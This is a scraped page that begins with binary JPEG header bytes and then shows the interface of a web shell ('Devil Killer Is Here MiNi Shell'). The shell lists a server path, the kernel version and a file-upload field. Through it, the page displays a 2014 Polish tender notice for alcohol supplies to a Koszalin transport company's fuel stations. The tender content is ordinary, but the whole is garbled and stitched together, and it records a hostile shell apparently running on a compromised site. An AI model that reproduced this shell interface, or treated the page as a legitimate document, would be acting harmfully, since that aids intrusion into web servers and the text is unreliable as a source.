JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141117/376990-N-2014.html

<p class="kh_header"><b>Koszalin: Sprzedaż i dostawa napojów alkoholowych do stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie</b><br>
<b>Numer ogłoszenia: 376990 - 2014; data zamieszczenia: 17.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Komunikacji Spółka z o.o. w Koszalinie , ul. Gnieźnieńska 9, 75-736 Koszalin, woj. zachodniopomorskie, tel. 094 3423021, faks 094 3422768.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostawa napojów alkoholowych do stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sprzedaż i dostawa napojów alkoholowych do dwóch stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie, sukcesywnie przez okres trwania umowy, w asortymencie i ilościach określonych w załączniku nr 1a, 1b i 1c do SIWZ. 
2. Przedmiot zamówienia musi być prawidłowo oznaczony odpowiednimi znakami akcyzy; zgodnie z ustawą z dnia  06 grudnia 2008 roku o podatku akcyzowym Dz. U. Nr  2009 Nr 3 poz. 11 z późniejszymi zmianami). 
3. Przedmiot zamówienia składa się z trzech części. Wykonawca może złożyć ofertę do wybranych przez siebie zadań (tzn. do zadania 1 i/lub do zadania 2 i/lub do zadania 3).
	Zadanie 1.
Szczegółową ilość i asortyment przedmiotu zamówienia CPV - 15961000-2 piwa określa załącznik nr 1a do Specyfikacji Istotnych Warunków Zamówienia.
Zadanie 2.
Szczegółową ilość i asortyment przedmiotu zamówienia CPV - 15930000-6 wina określa załącznik nr 1b do Specyfikacji Istotnych Warunków Zamówienia.
Zadanie 3.
Szczegółową ilość i asortyment przedmiotu zamówienia CPV - 15.91.11.00-8 wódki, 15.91.10.00-7 napoje spirytusowe, 15.91.12.00-9 likiery, określa załącznik nr 1c do Specyfikacji Istotnych Warunków Zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.96.10.00-2, 15.93.00.00-6, 15.91.11.00-8, 15.91.10.00-7, 15.91.12.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy posiadający aktualne zezwolenie na obrót hurtowy w kraju napojami alkoholowymi do 4,5% zawartości alkoholu oraz piwem w przypadku składania oferty dla zadania 1, 
2. O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy posiadający aktualne zezwolenie na obrót hurtowy w kraju napojami alkoholowymi powyżej 4,5 % do 18% zawartości alkoholu w przypadku składania oferty dla zadania 2,
3. O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy posiadający aktualne zezwolenie na obrót hurtowy w kraju napojami alkoholowymi powyżej 18% zawartości alkoholu w przypadku składania oferty dla zadania 3.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz stwierdzi brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Ustawy Prawo zamówień publicznych. Ocena spełnienia warunków dokonywana będzie, na podstawie analizy i weryfikacji przedstawionych oświadczeń i dokumentów pod kontem ich prawidłowości pod względem formalnym, prawnym i merytorycznym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku ubiegania się o udzielenie zamówienia wspólnie przez dwóch lub więcej Wykonawców dokumenty wymienione w punkcie 6.4. SIWZ muszą złożyć wszyscy Wykonawcy ubiegający się o udzielenie zamówienia. 
2.Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy (pkt. 6.3.a. SIWZ), polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w 6.4 SIWZ.
3.W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy składają jeden formularz Oferta, stanowiący załącznik nr 1a do SIWZ dla zadania 1 i/lub załącznik nr 1b do SIWZ dla zadania 2 i/lub załącznik 1c do SIWZ dla zadania 3.  
4. Jeżeli wykonawcę reprezentuje pełnomocnik - należy dołączyć do oferty pełnomocnictwo. Pełnomocnictwo musi być złożone w oryginale.
5.W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia należy dołączyć do oferty pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych. Pełnomocnictwo musi być złożone w oryginale</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin dostawy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną w formie pisemnej i tylko w przypadkach, o których mowa art. 144 ust.1 Ustawy - Prawo Zamówień Publicznych z dn.29.01.2004r (Dz. U. z 2010 Nr 113 poz.759 z późniejszymi zmianami) tj.  Zamawiający przewiduje możliwości dokonania zmiany umowy w formie aneksów w przypadku zmiany rzutującej na wynagrodzenie. Możliwa jest zmiana postanowień umowy w związku ze zmianą:
a.	stawki podatku od towarów i usług (VAT) lub narzuceniem innych obciążeń publiczno - prawnych związanych z asortymentem będącym przedmiotem umowy;
b.	trybu dostarczania i odbioru asortymentu;  
c.	wysokości podatków i akcyzy nakładanych na alkohole;
d.	zamówienia (zmniejszenie) w poszczególnych asortymentach
e.	zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniom zdrowotnym lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne;
f.	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679, z późniejszymi zmianami .
2. Określa się następujący tryb dokonywania zmian postanowień umowy:
- Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany;
- Zamawiający wnioskuje, aby Wykonawca przedłożył propozycję zmiany;
- Wykonawca wnioskuje do Zamawiającego o dokonanie wskazanej zmiany.
3.Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności - protokół konieczności wymaga zatwierdzenia przez Zamawiającego), itp</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzk.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Komunikacji Spółka z o.o. w Koszalinie
ul. Gnieźnieńska 9
75-736 Koszalin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2014 godzina 09:00, miejsce: Miejski Zakład Komunikacji Spółka z o.o. w Koszalinie
ul. Gnieźnieńska 9
75-736 Koszalin
sekretariat pokój nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. 1.W sprawach nieuregulowanych w Specyfikacji Istotnych Warunków Zamówienia (SIWZ) mają zastosowanie przepisy Prawa zamówień publicznych, aktów wykonawczych do ustawy oraz powszechnie obowiązujące przepisy prawa.
2.Postępowanie jest prowadzone z udziałem Komisji Przetargowej. 
3.Materiały przetargowe bezpłatnie udostępnione są na stronie internetowej www.mzk.koszalin.pl. Na wniosek wykonawcy Zamawiający przekazuje, w terminie 5 dni, Specyfikację Istotnych Warunków Zamówienia wraz z załącznikami w formie papierowej. Opłata wynosi 5,00 zł brutto za wydruk 1 strony plus rzeczywiste koszty jej przekazania i jest płatna przelewem na rachunek bankowy Zamawiającego BANK MILLENNIUM O/KOSZALIN nr rachunku S.W.I.F.T. BIGBPLPWXXX, IBAN PL 75 1160 2202 0000 0000 6175 0721 z opisem: za SIWZ dostawa napojów alkoholowych do stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie. 

II. Umowa obowiązywać będzie :
a)	dla zadania 1 - od 02 stycznia  2015 roku do wyczerpania ilości określonych w załączniku nr 1a SIWZ, jednak nie dłużej niż do 31 grudnia 2015 roku;
b)	dla zadania 2 - od 02 stycznia 2015 roku do wyczerpania ilości określonych w załączniku nr 1b SIWZ, jednak nie dłużej niż do 31 grudnia 2015 roku. 
c)	 dla zadania 3 od 02 stycznia 2015 roku do wyczerpania ilości określonych w załączniku nr 1c SIWZ, jednak nie dłużej niż do 31 grudnia 2015 roku.  

III. 1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
2. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy PZP, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
3. W przypadku Wykonawców, którzy ubiegają się wspólnie o udzielenie zamówienia, warunki określone w punkcie 5.1.1., 5.1.2., 5.1.3. SIWZ może spełniać jeden z Wykonawców. Żaden z Wykonawców nie może podlegać wykluczeniu na podstawie art. 24 ust.1 ustawy Prawo zamówień publicznych.  
4. Żaden z Wykonawców nie może podlegać wykluczeniu na podstawie art. 24 ust. 2 ustawy Prawo zamówień publicznych.  
5. Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków
zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.

IV. Nie dopuszcza się składania oświadczeń w formie kserokopii poświadczonej za zgodność z oryginałem.

V. Informacja o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń lub dokumentów, wskazanie osób uprawnionych do porozumiewania się z Wykonawcami, a także adres poczty elektronicznej lub strony internetowej zamawiającego, jeżeli zamawiający dopuszcza porozumienie się droga elektroniczną;
1.Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem: 
fax 94 342-27-68. Zamawiający dopuszcza przekazanie zawiadomienia oraz informacji drogą elektroniczną pod warunkiem, że niezwłocznie będą przekazane pisemnie lub faxem.
2.Każda ze stron, na żądanie drugiej, niezwłocznie potwierdza fakt otrzymania oświadczeń, wniosków, zawiadomień oraz informacji przekazanych faksem, a także zawiadomień i informacji przekazanych drogą elektroniczną.  
3.W formie pisemnej muszą być składane oświadczenia, dla których Ustawa PZP zastrzegła formę pisemną.
4.Osobami uprawnionymi do kontaktu z Wykonawcami są: 
Bogdan Śpica   - (94) 3445280; 601785477 - w sprawach technicznych     w godz. od 07:00 do 14:00
Lidia Klim          - (94) 3445285 - w sprawach proceduralnych. w godz. od 07:00 do 14:00
5. Nie udziela się żadnych ustnych i telefonicznych informacji, wyjaśnień czy odpowiedzi na kierowane do Zamawiającego zapytania w sprawach wymagających zachowania pisemności postępowania.
6.Korespondencję uważa się za złożoną w terminie, jeżeli jej treść dotarła do Zamawiającego przed upływem terminu i została niezwłocznie potwierdzona na piśmie.

VI. Opis sposobu przygotowania ofert;
1.Oferta musi być złożona na dołączonym do niniejszej specyfikacji formularzu, który stanowi integralną część specyfikacji (załącznik nr 1a dla zadania 1, załącznik nr 1b dla zadania 2, załącznik nr 1c dla zadania 3). Musi on być wypełniony czytelnie w języku polskim. Wszystkie załączniki winny być podpisane przez osoby uprawnione, ponumerowane i zszyte w jeden pakiet opatrzony spisem. Ofertę należy umieścić w zamkniętej wewnętrznej i zewnętrznej kopercie, które będą zaadresowane na Zamawiającego oraz będą posiadać oznaczenie Przetarg nieograniczony na dostawę napojów alkoholowych (zadanie nr 1 i/lub zadanie nr 2 i/lub zadanie nr 3) do Stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie. 
Poza wymienionymi oznaczeniami koperta wewnętrzna powinna posiadać nazwę i adres Wykonawcy. 
2. Oferta winna zawierać następujące dane dotyczące Wykonawcy:
a.	nazwa firmy;
b.	imię i nazwisko osoby działającej w imieniu Wykonawcy, adres firmy, pieczęć firmy.
3. Oferta będzie odrzucona w przypadkach określonych w Art.89 i w Art.24 ust.4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych tj. jeżeli:
a.	jest niezgodna z ustawą;
b.	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust 2 pkt. 3;
c.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów z zwalczaniu nieuczciwej konkurencji;
d.	zawiera rażąco nisko cenę w stosunku do przedmiotu zamówienia;
e.	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia; 
f.	zawiera błędy w obliczeniu ceny;
g.	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3;
h.	jest nieważna na podstawie odrębnych przepisów;
oraz jeżeli: 
i.	 nie będzie zawierała wszystkich elementów określonych w formularzu OFERTA stanowiącym załącznik nr 1a lub załącznik nr 1b lub załącznik nr 1c do SIWZ; 
j.	jest nieczytelna, nie podpisana lub podpisana przez osobę nieuprawnioną;
4. Ofertę stanowi wypełniony formularz OFERTA wraz dołączonymi załącznikami i dokumentami. 
5.Każda poprawka w treści oferty, a w szczególności każde przerobienie, przekreślenie, uzupełnienie, nadpisanie, itp. powinno być parafowane przez Wykonawcę, w przeciwnym razie nie będzie uwzględnione.
